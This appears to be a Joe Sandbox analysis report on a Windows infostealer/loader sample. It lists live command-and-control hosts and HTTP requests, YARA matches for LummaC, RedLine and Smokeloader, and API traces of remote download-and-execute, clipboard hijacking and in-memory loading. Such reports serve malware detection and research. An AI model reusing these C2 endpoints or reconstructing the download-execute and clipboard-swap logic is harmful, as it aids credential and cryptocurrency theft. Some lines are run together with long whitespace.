2024-12-14 13:16:18 UTC | 90 | OUT | GET /track_prt.php?sub=0&cc=DE HTTP/1.1
User-Agent: ShareScreen
Host: post-to-me.com
2024-12-14 13:16:18 UTC | 800 | IN | HTTP/1.1 200 OK
Date: Sat, 14 Dec 2024 13:16:18 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.4.16
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Tg3bDCtfr4Fl6drrIl%2BAV2p75Nh1vOzBbuzrumL83LOpgpIt54knGtW2qVTKqmZjPCZG0G0buMg3OHCKsadw28AVwcIwmclRSFp%2FfFems6GEbfMpp%2BDbuqst88ACks7dQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f1e77b7ee628c75-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=1935&rtt_var=785&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=728&delivery_rate=1509043&cwnd=195&unsent_bytes=0&cid=b4c6311b6eac5a8c&ts=670&x=0"
2024-12-14 13:16:18 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-14 13:16:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
1          | 192.168.2.6 | 49752       | 104.21.22.22   | 443              | 7844 | C:\Users\user\AppData\Local\Temp\1A68.tmp.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-14 13:16:27 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: immureprech.biz
2024-12-14 13:16:27 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-14 13:16:28 UTC | 1008 | IN | HTTP/1.1 200 OK
Date: Sat, 14 Dec 2024 13:16:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=t2kbglrm708su6ugjanrouepeg; expires=Wed, 09-Apr-2025 07:03:07 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qJ33TGqgayidZEkBcEoDq4EixyiajUxO1%2Bb48RdZtO7b0F3RbyU3ZxLynZEC4VDN02nOCyvAiNtWfwuN0NsynGgpMLwQUPEmO4J5FJhO1Qm2X7goHvFUVqj0PsLUI4MIdUY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f1e77f1f8ea8c42-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1839&min_rtt=1824&rtt_var=695&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=906&delivery_rate=1600877&cwnd=252&unsent_bytes=0&cid=ac1606355b195435&ts=1059&x=0"
2024-12-14 13:16:28 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-12-14 13:16:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
2          | 192.168.2.6 | 49759       | 104.21.96.1    | 443              | 7844 | C:\Users\user\AppData\Local\Temp\1A68.tmp.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-14 13:16:29 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: deafeninggeh.biz
2024-12-14 13:16:29 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-14 13:16:30 UTC | 1013 | IN | HTTP/1.1 200 OK
Date: Sat, 14 Dec 2024 13:16:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=gf8buisqh5no27ufeqlu7jkapb; expires=Wed, 09-Apr-2025 07:03:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BBtDWxocfip2S1KB8whrv46QQQVdh4K8bhDZ7oHQ6Ti%2BwgYPgbK3XZsYbxvWF4wacXZ0AlftKsLVW50lucfV2aZSoS6%2B5NZZwbNyZ%2BVwA18C3zcvr%2FlbRBND8Aq9KqeX8kKN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8f1e78013cc6c32e-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1698&min_rtt=1696&rtt_var=640&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1702623&cwnd=178&unsent_bytes=0&cid=0f7256eea46a99c4&ts=888&x=0"
                                                                                                                                                                                                                                                                  2024-12-14 13:16:30 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: aerror #D12
                                                                                                                                                                                                                                                                  2024-12-14 13:16:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49768 | 23.55.153.106 | 443 | 7844 | C:\Users\user\AppData\Local\Temp\1A68.tmp.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 13:16:33 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2024-12-14 13:16:34 UTC | 1905 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Sat, 14 Dec 2024 13:16:34 GMT
Content-Length: 35131
Connection: close
Set-Cookie: sessionid=8f6588a84e666db3c620827b; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-14 13:16:34 UTC | 14479 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-14 13:16:34 UTC | 10097 | IN | Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
2024-12-14 13:16:34 UTC | 10555 | IN | Data Ascii: ;WEB_UNIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&qu


Target ID: 0
Start time: 08:16:12
Start date: 14/12/2024
Path: C:\Users\user\Desktop\rHrG691f7q.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\rHrG691f7q.exe"
Imagebase: 0x400000
File size: 429'056 bytes
MD5 hash: F610013D7C84F779AFA017218890E7CE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4623077365.00000000009F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: false

Target ID: 3
Start time: 08:16:21
Start date: 14/12/2024
Path: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\1A68.tmp.exe"
Imagebase: 0x400000
File size: 361'984 bytes
MD5 hash: D88E2431ABAC06BDF0CD03C034B3E5E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.2433571436.00000000008C9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 42%, ReversingLabs
Reputation: low
Has exited: true

                                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                                  Start time:08:16:34
                                                                                                                                                                                                                                                                  Start date:14/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7844 -s 612
                                                                                                                                                                                                                                                                  Imagebase:0xe60000
                                                                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true


Execution Graph

Execution Coverage:2.5%
Dynamic/Decrypted Code Coverage:3.7%
Signature Coverage:5.7%
Total number of Nodes:759
Total number of Limit Nodes:21
65377->65246 65378->65245 65379->65373 65389 431f5e GetLastError 65380->65389 65382 42e083 ExitThread 65383 42e0a1 65386 42e0ad CloseHandle 65383->65386 65387 42e0b4 65383->65387 65386->65387 65387->65382 65388 42e0c0 FreeLibraryAndExitThread 65387->65388 65390 431f7d 65389->65390 65391 431f77 65389->65391 65393 434d2a __Thrd_start 17 API calls 65390->65393 65395 431fd4 SetLastError 65390->65395 65409 435111 11 API calls 2 library calls 65391->65409 65394 431f8f 65393->65394 65402 431f97 65394->65402 65410 435167 11 API calls 2 library calls 65394->65410 65396 42e07f 65395->65396 65396->65382 65396->65383 65408 4354f6 10 API calls 2 library calls 65396->65408 65398 43346a _free 17 API calls 65400 431f9d 65398->65400 65399 431fac 65401 431fb3 65399->65401 65399->65402 65403 431fcb SetLastError 65400->65403 65411 431d4c 20 API calls __Wcrtomb 65401->65411 65402->65398 65403->65396 65405 431fbe 65406 43346a _free 17 API calls 65405->65406 65407 431fc4 65406->65407 65407->65395 65407->65403 65408->65383 65409->65390 65410->65399 65411->65405 65412->65061 65413 40239e 65414 402561 PostQuitMessage 65413->65414 65415 4023b2 65413->65415 65416 40255f 65414->65416 65417 4023b9 DefWindowProcW 65415->65417 65418 4023d0 65415->65418 65417->65416 65418->65416 65419 4029f4 167 API calls 65418->65419 65419->65416

Control-flow Graph

APIs
• __EH_prolog3_GS.LIBCMT ref: 004016E6
• Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
  • Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27
• OpenClipboard.USER32(00000000), ref: 0040171D
• GetClipboardData.USER32(00000001), ref: 0040172D
• GlobalLock.KERNEL32(00000000), ref: 0040173C
• _strlen.LIBCMT ref: 00401749
• _strlen.LIBCMT ref: 00401778
• _strlen.LIBCMT ref: 004018BC
• EmptyClipboard.USER32 ref: 004018D2
• GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
• GlobalLock.KERNEL32(00000000), ref: 004018FD
• GlobalUnlock.KERNEL32(00000000), ref: 00401909
• SetClipboardData.USER32(00000001,00000000), ref: 00401912
• GlobalFree.KERNEL32(00000000), ref: 00401919
• CloseClipboard.USER32 ref: 0040193D
• Sleep.KERNEL32(000002D2), ref: 00401948
Strings
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
• String ID: i
• API String ID: 1583243082-3865851505
• Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
• Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
• Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
• Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D

Control-flow Graph

APIs
• InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
• InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
• GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
• GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
• InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
• CloseHandle.KERNEL32(00000000), ref: 00402B07
• ShellExecuteExW.SHELL32(?), ref: 00402B68
• WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
• CloseHandle.KERNEL32(?), ref: 00402B89
• InternetCloseHandle.WININET(00000000), ref: 00402B92
• InternetCloseHandle.WININET(00000000), ref: 00402B95
Strings
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
• String ID: .exe$<$ShareScreen
• API String ID: 3323492106-493228180
• Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
• Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
• Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
• Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 009F9F6E
• Module32First.KERNEL32(00000000,00000224), ref: 009F9F8E
Memory Dump Source
• Source File: 00000000.00000002.4623077365.00000000009F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009F9000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9f9000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0
• Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction ID: 0fabc61ce2fd9ceaf5e346c2d7402b9798cf50747d8437352ec01e7698fc71f0
• Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction Fuzzy Hash: 56F06D326007196FD7203BF9A98DB7EB6ECAF89725F100528E746D10C0DB70EC458B61

Control-flow Graph

control_flow_graph 74 43d03c-43d06c call 43cd9f 77 43d087-43d093 call 43977e 74->77 78 43d06e-43d079 call 42eab6 74->78 84 43d095-43d0aa call 42eab6 call 42eac9 77->84 85 43d0ac-43d0f5 call 43cd0a 77->85 83 43d07b-43d082 call 42eac9 78->83 92 43d35e-43d364 83->92 84->83 94 43d162-43d16b GetFileType 85->94 95 43d0f7-43d100 85->95 96 43d1b4-43d1b7 94->96 97 43d16d-43d19e GetLastError call 42ea93 CloseHandle 94->97 99 43d102-43d106 95->99 100 43d137-43d15d GetLastError call 42ea93 95->100 104 43d1c0-43d1c6 96->104 105 43d1b9-43d1be 96->105 97->83 113 43d1a4-43d1af call 42eac9 97->113 99->100 101 43d108-43d135 call 43cd0a 99->101 100->83 101->94 101->100 106 43d1ca-43d218 call 4396c7 104->106 107 43d1c8 104->107 105->106 116 43d21a-43d226 call 43cf1b 106->116 117 43d228-43d24c call 43cabd 106->117 107->106 113->83 116->117 123 43d250-43d25a call 4335cd 116->123 124 43d25f-43d2a2 117->124 125 43d24e 117->125 123->92 127 43d2c3-43d2d1 124->127 128 43d2a4-43d2a8 124->128 125->123 130 43d2d7-43d2db 127->130 131 43d35c 127->131 128->127 129 43d2aa-43d2be 128->129 129->127 130->131 133 43d2dd-43d310 CloseHandle call 43cd0a 130->133 131->92 136 43d312-43d33e GetLastError call 42ea93 call 439890 133->136 137 43d344-43d358 133->137 136->137 137->131
APIs
  • Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
• GetLastError.KERNEL32 ref: 0043D150
• __dosmaperr.LIBCMT ref: 0043D157
• GetFileType.KERNEL32(00000000), ref: 0043D163
• GetLastError.KERNEL32 ref: 0043D16D
• __dosmaperr.LIBCMT ref: 0043D176
• CloseHandle.KERNEL32(00000000), ref: 0043D196
• CloseHandle.KERNEL32(?), ref: 0043D2E0
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0043D312
                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 0043D319
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                    • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                                                                                                                                                                                    • Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

                                                                                                                                                                                                                                                                    Control-flow Graph

Control-flow graph for the function at 00432F29 (executed/not-executed legend and node/edge dump omitted). Its blocks call the subroutines 0042EAB6, 0042EAC9, 0042A59D, 004336A7, 0043346A, 004347EE, 0043D365, 0042EA93, 00432C45, 00432D95 and 00432A85; APIs reached on the graph: ReadFile, GetConsoleMode, ReadConsoleW, GetLastError.
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                                                                                                                                                                                    • Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 250 24c003c-24c0047 251 24c004c-24c0263 call 24c0a3f call 24c0e0f call 24c0d90 VirtualAlloc 250->251 252 24c0049 250->252 267 24c028b-24c0292 251->267 268 24c0265-24c0289 call 24c0a69 251->268 252->251 270 24c02a1-24c02b0 267->270 272 24c02ce-24c03c2 VirtualProtect call 24c0cce call 24c0ce7 268->272 270->272 273 24c02b2-24c02cc 270->273 279 24c03d1-24c03e0 272->279 273->270 280 24c0439-24c04b8 VirtualFree 279->280 281 24c03e2-24c0437 call 24c0ce7 279->281 283 24c04be-24c04cd 280->283 284 24c05f4-24c05fe 280->284 281->279 286 24c04d3-24c04dd 283->286 287 24c077f-24c0789 284->287 288 24c0604-24c060d 284->288 286->284 292 24c04e3-24c0505 LoadLibraryA 286->292 290 24c078b-24c07a3 287->290 291 24c07a6-24c07b0 287->291 288->287 293 24c0613-24c0637 288->293 290->291 294 24c086e-24c08be LoadLibraryA 291->294 295 24c07b6-24c07cb 291->295 296 24c0517-24c0520 292->296 297 24c0507-24c0515 292->297 298 24c063e-24c0648 293->298 303 24c08c7-24c08f9 294->303 299 24c07d2-24c07d5 295->299 300 24c0526-24c0547 296->300 297->300 298->287 301 24c064e-24c065a 298->301 304 24c0824-24c0833 299->304 305 24c07d7-24c07e0 299->305 306 24c054d-24c0550 300->306 301->287 302 24c0660-24c066a 301->302 309 24c067a-24c0689 302->309 311 24c08fb-24c0901 303->311 312 24c0902-24c091d 303->312 310 24c0839-24c083c 304->310 313 24c07e4-24c0822 305->313 314 24c07e2 305->314 307 24c0556-24c056b 306->307 308 24c05e0-24c05ef 306->308 315 24c056d 307->315 316 24c056f-24c057a 307->316 308->286 317 24c068f-24c06b2 309->317 318 24c0750-24c077a 309->318 310->294 319 24c083e-24c0847 310->319 311->312 313->299 314->304 315->308 320 24c057c-24c0599 316->320 321 24c059b-24c05bb 316->321 322 24c06ef-24c06fc 317->322 323 24c06b4-24c06ed 317->323 
318->298 324 24c0849 319->324 325 24c084b-24c086c 319->325 333 24c05bd-24c05db 320->333 321->333 327 24c06fe-24c0748 322->327 328 24c074b 322->328 323->322 324->294 325->310 327->328 328->309 333->306
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 024C024D
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                                    • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                    • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                    • Instruction ID: fc6d8bf3b30f58ecec1e8ce670d687e404b49ad6cec5627aabf533009412aab4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D526C74A01229DFDBA4CF58C984BADBBB1BF09304F1480DAE54DAB351DB30AA95CF14

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27
                                                                                                                                                                                                                                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                                                                                                                                                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                                                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00402E4B
                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00402E4E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandleOpen_wcslen
                                                                                                                                                                                                                                                                    • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                                                                                                                                                                                                                                    • API String ID: 3067768807-1501832161
                                                                                                                                                                                                                                                                    • Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                                                                                                                                                                                                                                    • Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E
